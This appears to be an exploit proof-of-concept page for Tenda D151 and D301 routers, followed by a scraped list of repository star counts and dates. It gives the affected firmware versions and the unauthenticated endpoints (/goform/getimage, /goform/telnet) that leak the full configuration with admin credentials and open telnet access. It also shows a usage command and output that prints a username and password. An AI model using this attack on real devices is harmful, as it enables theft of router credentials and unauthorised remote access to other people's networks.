Tenda D151 D301 exploit (Proof of Concept)
Exploit Title: Tenda D151 & D301 - Unauthenticated configuration download (login included)
-
Exploit Author: BenChaliah
-
Vendor Homepage: https://www.tendacn.com
-
Software Link: https://www.tendacn.com/us/download/detail-3331.html
-
Versions:
- D301 1.2.11.2_EN
- D301 V2.0 50.22.1.8_EN
- D151 V2.0 50.21.1.5_EN
Description
This exploits allows for the download of the current router config including the admin login, just by requesting {IP}/goform/getimage, you can also activate telnet service by requesting /goform/telnet (the service is already on by default, but this will execute an iptable command allowing access).
The configuration exists in the last part of the downloaded firmware image.
Usage (Python 2.7):
$ python exploit.py http://192.168.1.1
_ _
___ (~ )( ~)
/ \_\ \/ /
| D_ ]\ \/ -- By [email protected]@h
| D _]/\ \ -- github.com/BenChaliah
\___/ / /\ \
(_ )( _)
[!] Downloading config
username: admin
password: testpass
1 Dec 11, 2021
12 Dec 27, 2022
16 Dec 30, 2022
1 Jan 08, 2022
1 Oct 26, 2021
28 Dec 30, 2022
3 Nov 07, 2021
![Fw[a]rd](https://avatars.githubusercontent.com/u/18005538?v=4&s=60)
3 Jun 27, 2021
20 Jan 06, 2023
5 Jun 24, 2022
2 Jan 12, 2022
136 Dec 23, 2022
1 Jul 06, 2022
38 Jan 06, 2023
14 Jun 29, 2022
12 Nov 21, 2022
552 Dec 19, 2022
2 Dec 31, 2021
76 Jan 07, 2023
4.3k Jan 09, 2023